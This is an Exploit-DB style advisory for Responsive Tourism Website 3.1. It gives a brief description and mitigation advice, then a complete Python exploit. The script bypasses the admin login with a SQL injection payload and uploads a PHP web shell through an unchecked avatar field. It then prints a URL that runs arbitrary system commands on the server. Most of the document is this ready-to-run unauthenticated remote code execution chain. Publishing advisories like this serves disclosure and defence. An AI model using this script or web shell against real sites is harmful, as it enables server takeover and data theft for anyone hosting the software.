Vendor: Responsive Tourism Website
By: Tagoletta (Tağmaç)
CVSS: 9.8 (HIGH)
Vulnerability Type: Remote Code Execution (RCE)
CWE: 89 (SQL Injection)
Product Name: Responsive Tourism Website
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MacOS & Windows
Year: 2021

Responsive Tourism Website 3.1 – Remote Code Execution (RCE) (Unauthenticated)

This exploit gives an unauthenticated attacker remote code execution on Responsive Tourism Website 3.1 by chaining two flaws. First, the login handler at classes/Login.php?f=login builds its SQL query from the raw username and password fields, so the payload admin' or '1'='1'# closes the string literal, forces the WHERE clause true and comments out the rest of the query (the password check included), which yields an admin session. Second, the profile save handler at classes/Users.php?f=save accepts the avatar (img) upload without checking its extension or content, so a .php file is written under the web root and its URL is exposed as the src of the avatar image on admin/?page=user. Requesting that URL with a cmd parameter runs arbitrary system commands with the privileges of the web server user.

Mitigation:

Build the login query with prepared statements (bound parameters) instead of string concatenation, so that the username and password are only ever compared as data. For the avatar upload, enforce an allowlist of image extensions, verify that the file content matches the claimed type, store the file under a server-generated name, and configure the web server so that nothing in the upload directory is executed as PHP. No vendor patch exists at the time of writing, so these changes have to be made in the application code directly; if a fixed release is ever published, update to it.

Exploit-DB raw data:

# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 22.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html
# Version: V 3.1
# Tested on: MacOS & Windows

import random
import string

import requests
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"


session = requests.Session()
# Initial GET so the server issues a session cookie that the Session object then carries.
session.get(url + 'admin/login.php')

print("- Bypassing login -")

# SQL injection in the login handler: the quote closes the string literal, or '1'='1'
# makes the WHERE clause true and '#' (MySQL comment) discards the rest of the query.
login_url = url + "classes/Login.php?f=login"
login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"}
session.post(login_url, data=login_data)

print("- Protecting User -")

# Read the current admin record so the profile save below does not overwrite it.
protectSettings_url = url + 'admin/?page=user'
protectSetting_html = session.get(protectSettings_url)
protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser')

id_field = protectSettings_parser.find('input', {'name': 'id'})
if id_field is None:
    raise SystemExit("Login bypass failed: no user form found at " + protectSettings_url)

ids = id_field.get("value")
firstname = protectSettings_parser.find('input', {'id': 'firstname'}).get("value")
lastname = protectSettings_parser.find('input', {'id': 'lastname'}).get("value")
username = protectSettings_parser.find('input', {'id': 'username'}).get("value")

print("User ID : " + ids)
print("First Name : " + firstname)
print("Last Name : " + lastname)
print("Username : " + username)

print("- OK -")

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

print("Shell uploading")

# The profile save endpoint stores the 'img' field without checking its extension or
# content, so a .php file ends up under the web root and is served back as the avatar.
upload_url = url + "classes/Users.php?f=save"
boundary = "----WebKitFormBoundary7gB8BDj2OLQBJbBT"
upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=" + boundary, "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"


def part(name, value):
    # One plain form field of the multipart body.
    return "--" + boundary + "\r\nContent-Disposition: form-data; name=\"" + name + "\"\r\n\r\n" + value + "\r\n"


upload_data = (part("id", ids) + part("firstname", firstname) + part("lastname", lastname)
               + part("username", username) + part("password", "")
               + "--" + boundary + "\r\nContent-Disposition: form-data; name=\"img\"; filename=\""
               + shellname + "_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"
               + upload_payload + "\r\n--" + boundary + "--\r\n")
# Encode explicitly so non-ASCII names read from the profile do not break the request body.
upload = session.post(upload_url, headers=upload_headers, data=upload_data.encode("utf-8"))

if upload.status_code == 200:
    print("- OK -")
    # The avatar <img id="cimg"> on the user page now points at the uploaded PHP file.
    req = session.get(url + "admin/?page=user")
    parser = BeautifulSoup(req.text, 'html.parser')
    find_shell = parser.find('img', {'id': 'cimg'})
    if find_shell is None or not find_shell.get("src"):
        raise SystemExit("Upload returned 200 but no avatar image was found on the user page")
    print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
    print("- NO :( -")